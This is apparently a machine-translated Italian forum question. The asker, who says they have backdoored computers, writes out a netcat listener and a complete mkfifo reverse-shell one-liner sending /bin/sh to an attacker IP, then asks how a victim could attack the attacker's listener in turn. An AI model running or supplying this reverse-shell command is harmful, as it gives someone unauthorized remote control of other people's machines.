Sono entrato nei computer e nei server backdooring utilizzando un software specializzato o qualche comando malevolo che genera una backdoor sul computer di destinazione, quindi invia il terminale alla mia sessione di ascolto netcat sul mio server.
Anche se questo è un campo interessante, per vedere quanto sia facile fare quel tipo di cose, ho avuto una certa curiosità nel tentare di fare qualcos'altro.
Mi stavo chiedendo la possibilità di generare una backdoor sul server che sta ascoltando su una porta usando Netcat. Preferibilmente una macchina Linux. Il comando dovrebbe assomigliare a qualcosa del tipo:
root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
Questo è in pratica l'aspetto del server dell'attaccante. Quindi dì che stava aspettando su una backdoor per deporre le uova sulla macchina della sua vittima. La vittima avrebbe eseguito alcuni comandi sulla sua macchina Linux come:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 9000 >/tmp/f
Supponendo che l'indirizzo IP 10.0.0.1
sia l'IP dell'attaccante. A questo punto, l'attaccante (dopo che la vittima ha eseguito questo comando malevolo), vedrebbe questo:
root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
$
e da lì l'attaccante ha ora un terminale che viene convogliato sul suo server dalla vittima.
Come potrei abusare di questo, e invece della vittima che invia una shell all'attaccante, in che modo la vittima può backdoor la porta aperta dell'attaccante (9000)
che sta usando Netcat?